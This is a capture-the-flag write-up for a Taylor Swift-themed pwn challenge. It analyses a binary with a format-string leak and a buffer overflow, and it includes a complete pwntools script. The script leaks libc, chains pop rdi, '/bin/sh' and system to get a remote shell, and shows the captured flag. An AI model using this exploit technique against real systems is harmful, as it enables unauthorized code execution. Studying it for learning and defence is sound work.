Let’s first check the enabled mitigations in the binary, by using checksec:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
It appears that this challenge is quite easy, PIE is not enabled, there’s no stack canaries, but the stack is not executable, so basically at first it seems like a classical ROP challenge.
Decompiling the main function in ghidra, we get this, as you can see there’s a format string vulnerability in printf(song), which we’ll use later to leak some addresses.
undefined8 main(void) {
setbuf(stdout,(char *)0x0);
help_me();
printf("sooo... anyways whats your favorite Taylor Swift song? ");
fflush(stdout);
read(0,song,200);
printf("Ooohh! ");
printf(song);
puts("Thats a good one!");
return 0;
}And here’s the help_me function, As you can see the variable buffer allocates 64 bytes in the stack, while the function fgets reads up to 100 bytes from the standard input which basically means there’s a buffer overflow vulnerabilty, so we can control the instruction pointer RIP by writing the address at the offset 72, which you can discover using the cyclic pattern or just calculating it directly.
undefined8 help_me(void) {
char buffer [64];
puts("I was going to go to the eras tour, but something came up :(");
puts("You can have my ticket! Only thing is... I forgot where I put it...");
puts("Do you know where it could be?! ");
fgets(buffer,100,stdin);
fflush(stdin);
return 0;
}There’s another not used function in the binary use_ticket:
void use_ticket(void *param_1) {
FILE *__stream;
size_t sVar1;
__stream = (FILE *)FUN_00401120("flag.txt",&DAT_00402008);
if (__stream == (FILE *)0x0) {
printf("flag.txt not found");
}
else {
sVar1 = fread(param_1,1,0x27,__stream);
*(undefined *)((long)param_1 + (long)(int)sVar1) = 0;
}
return;
}Now it appears that the way we’ll get the flag is as follows:
- Use the format string vulnerabilty to get the address of the variable
song - Pass this address to the function
use_ticket, to fill in the flag - Print the variable
songBut there’s a problem in the second payload, in order to pass the address ofsongtouse_ticketwe need the gadgetPOP RDI; RET;which doesn’t exist in the binary (rememberPIEis disabled), we can surely find this gadget in libc so we’ll need a leak. In short we’ll need to use two payloads, we’ll exploit the buffer overflow to jump into the format string vulnerabilty, we’ll grab the address of libc and then get back to thehelp_mefunction to inject our second payload which’ll give us the flag, so the first payload we’ll look like this:
+--------------------------+
| |
| |
| |
| 72 byte junk data |
| |
| |
| |
| |
+--------------------------+
+--------------------------+
|read(0, song, 200) |
+--------------------------+
+--------------------------+
|junk 8 bytes |
+--------------------------+
+--------------------------+
|help_me() |
+--------------------------+
And our second payload will look like this:
+--------------------------+
| |
| |
| |
| 72 byte junk data |
| |
| |
| |
| |
+--------------------------+
+--------------------------+
|help_me() |
+--------------------------+
+--------------------------+
|address of `POP RDI; RET;`|
+--------------------------+
+--------------------------+
|use_ticket(song) |
+--------------------------+
+--------------------------+
|printf(song) |
+--------------------------+
Anyway, I didn’t notice it before testing; fgets reads 100 bytes, 72 are already used for junk so we only have 28 bytes for our payload, we still need 4 bytes, so we need another strategy.
To keep it short, I’ve tried a lots of methods to get more space for the payload but they all seem to not work for a reason or another, so because I already got the libc base it seemed to me more logical to actually get a shell and read the flag, especially that we only need 24 bytes to get a shell, so the second payload will look like this:
+--------------------------+
| |
| |
| |
| 72 byte junk data |
| |
| |
| |
| |
+--------------------------+
+--------------------------+
|address of `POP RDI; RET;`|
+--------------------------+
+--------------------------+
|address of '/bin/sh' |
+--------------------------+
+--------------------------+
| address of `system` |
+--------------------------+
Finally here’s the working exploit:
from pwn import *
gdbscript = '''
init-pwndbg
break use_ticket
'''.format(**locals())
exe = './chal'
elf = context.binary = ELF(exe, checksec=False)
libc = ELF("./libc.so.6", checksec=False)
libc_rop = ROP(libc)
libc_offset = 0x29e40
READ_PRINTF = 0x0000000000401342
offset = 72
def start(argv=[], *a, **kw):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE:
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else:
return process([exe] + argv, *a, **kw)
io = start()
# ------------------------- leaks
log.info("Sending stage 1 ...")
payload1 = flat({
offset: [
p64(READ_PRINTF),
b'A'*8,
p64(elf.symbols['help_me'])
]
})
io.sendlineafter(b"Do you know where it could be?! ", payload1)
io.clean()
io.sendline(b"%p."*33)
rcv = io.recvuntil(b"Thats a good one!\n")
leak = int(rcv.split(b" ")[1].split(b".")[26].decode("utf-8"), 16)
libc.address = leak - libc_offset
log.success(f"Found libc address 0x{libc.address:x}")
# ------------------------- getting shell
log.info("Sending stage 2 ...")
payload2 = flat([
cyclic(72),
p64(libc.address + libc_rop.find_gadget(["pop rdi", "ret"])[0]),
p64(next(libc.search(b'/bin/sh\x00'))),
p64(libc.symbols['system'])
])
io.sendlineafter(b"Do you know where it could be?! ", payload2)
# ------------------------- got a shell
io.interactive()After executing
[*] Loaded 219 cached gadgets for './libc.so.6'
[+] Opening connection to gold.b01le.rs on port 4008: Done
[*] Sending stage 1 ...
[+] Found libc address 0x7f20b5a2a000
[*] Sending stage 2 ...
[*] Switching to interactive mode
$ cat flag*
bctf{dr1ving_a_n3w_maser@t1_d0wn_@_d3ad_3nd_str33t_eb30c235cde76705}
If you have any thoughts, please let me know in the comments.